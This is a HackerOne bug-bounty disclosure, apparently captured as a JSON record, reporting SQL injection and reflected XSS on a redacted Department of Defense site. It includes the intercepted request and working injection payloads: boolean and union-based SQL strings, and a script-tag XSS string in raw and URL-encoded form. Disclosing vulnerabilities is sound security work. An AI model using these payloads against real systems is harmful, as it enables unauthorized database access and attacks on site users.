{"id": "H1:484801", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "U.S. Dept Of Defense: [\u2588\u2588\u2588] SQL injection & Reflected XSS", "description": "###SQL injection test###\n\n1. Go to site [\u2588\u2588\u2588\u2588\u2588\u2588\u2588](http://\u2588\u2588\u2588\u2588\u2588/)\n2. Intercept this request\n\n```\nPOST /viewem6.php HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: ru,en-US;q=0.7,en;q=0.3\nAccept-Encoding: gzip, deflate\nReferer: https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 28\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nrememail=test&rememail2=test\n```\nSet this payload to param ```rememail```\n\n```\n' or '1'='1\n```\n\nor \n```\n' or true --+\n```\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\nBut if you set another payload \n```\n' or '1'='2\n```\n\nor \n```\n' or false --+\n```\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\nAlso if you set payload\n```\n' union select 1--\n```\n\nYou will have another request\n\u2588\u2588\u2588\u2588\u2588\n\nI did not begin to extract any data about the server or database, since this may be contrary to the rules.\n\n###Reflected XSS###\n\nUsing this payload I can execute XSS\n\n```\n' or '\"<script>alert(1)</script>'='\"<script>alert(1)</script>\n```\n\nYou need to encode this payload\n\n```\n%27 or %27\"<script>alert(1)</script>%27=%27\"<script>alert(1)</script>\n```\n\nResult in Burp\n\u2588\u2588\u2588\u2588\u2588\n\n## Impact\n\nUsing this bug hacker can get access to database of server, also hacker can exploit XSS injection.", "published": "2019-01-23T21:08:17", "modified": "2019-12-02T19:11:46", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/484801", "reporter": "jarvis7", "references": [], "cvelist": [], "lastseen": "2019-12-02T20:29:48", "viewCount": 2, "enchantments": {"dependencies": {"references": [], "modified": "2019-12-02T20:29:48", "rev": 2}, "score": {"value": 0.3, "vector": "NONE", "modified": "2019-12-02T20:29:48", "rev": 2}, "vulnersScore": 0.3}, "bounty": 0.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/deptofdefense", "handle": "deptofdefense", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/016/064/46cd0286b1fa224aaa2cb9dfaaca9fa22b5b80b2_original.png/3afcb5c896247e7ee8ada31b1c1eb8657e22241f911093acfe4ec7e97a3a959a", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/016/064/46cd0286b1fa224aaa2cb9dfaaca9fa22b5b80b2_original.png/eb31823a4cc9f6b6bb4db930ffdf512533928a68a4255fb50a83180281a60da5"}}, "h1reporter": {"disabled": false, "username": "jarvis7", "url": "/jarvis7", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/074/981/b2ac207af259985cde15c3291f708ea28bdbe37a_original.png/3afcb5c896247e7ee8ada31b1c1eb8657e22241f911093acfe4ec7e97a3a959a"}, "is_me?": false, "cleared": false, "hackerone_triager": false, "hacker_mediation": false}, "immutableFields": []}

{}